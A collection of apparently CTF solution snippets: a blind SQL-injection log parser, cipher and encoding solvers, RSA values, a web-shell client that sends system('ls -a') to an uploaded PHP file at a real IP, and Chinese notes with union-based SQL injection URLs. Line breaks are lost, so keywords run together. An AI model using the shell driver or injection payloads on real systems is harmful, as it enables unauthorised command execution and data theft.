with open('access.log') as f: for el in f.readlines(): decode_and_write(el) file.close()
i = 0 flag = '' with open('log.txt','rb') as ff: i = i + 1 char = '' for el in ff.readlines(): num1 = re.findall(r'AND ORD\(MID\(\(SELECT IFNULL\(CAST\(flag AS CHAR\),0x20\) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1\),(.*?),1\)\)>.*?',el) num2 = re.findall(r'AND ORD\(MID\(\(SELECT IFNULL\(CAST\(flag AS CHAR\),0x20\) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1\),.*?,1\)\)>(.*?) AND',el) if num1[0] == str(i): char = chr(int(str(num2[0]))) else: flag += chr(ord(char)+1) i = i + 1 if num1[0] == str(i): char = chr(int(str(num2[0])))
pic = Image.new("RGB",(150, 900)) fo = open("basic.txt","r") pics = [] i=0 whileTrue: if i == 135000: break a = fo.readline() pics.append(a) i = i + 1 str = "" i=0 for y in range (0,150): for x in range (0,900): s = pics[i].split(',') pic.putpixel([y,x],(int(s[0]), int(s[1]), int(s[2]))) i = i+1
file = open("text.txt",'r') jin = file.read().split(' ')
data = ''
for i in jin: if str(i)[:1] == 'd': tmp = chr(int(str(i)[1:])) data += tmp if str(i)[:1] == 'x': data += chr(int(str(i)[1:],16)) if str(i)[:1] == 'b': data += chr(int(str(i)[1:],2)) if str(i)[:1] == 'o': data += chr(int(str(i)[1:],8)) print data
defaffine(a, b): pwd_dic = {} for i in range(26): pwd_dic[chr(((a * i + b) % 26 + 97))] = chr(i + 97) return pwd_dic defmain(): pwd_dic = {} pwd = raw_input('str: ') a = input('input a (c = (am + b) mod 26) : ') b = input('input b (c = (am + b) mod 26) : ') plain = [] pwd_dic = affine(a, b) print(pwd_dic) for i in pwd: plain.append(pwd_dic[i]) print("flag is :" + "".join(plain)) if __name__ == '__main__': main()
N : 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597 e : 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
u = 'http://47.105.148.65:29002/uploads/8af92ffefda7050707590b352dfb3cd2e03d29a6/s.php' passwd = 's' com = 'ls -a' payload = {passwd:'system(\''+com+'\');'} s = requests.Session() while1: try: res = s.post(u,payload) print("[+] success\n"+res.text+"===") except: print("failed")
easy_flask
Search Comments:处存在sql注入
' order by 4# 出现错误
http://47.105.148.65:29003/?username=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'ctf' and table_name='comment'),3%23
得到id,username,comment
但是只能在第三个字段查询,且' union select 1,2,comment from comment%23会出现和' or 1=1%23一样的Rendering Error.
出现了模版渲染错误
直接' union select 1,2,10%23测试报 Mysql Error.错误,应该是花括号原因,不过mysql支持0x开头的16进制,以16进制传入即可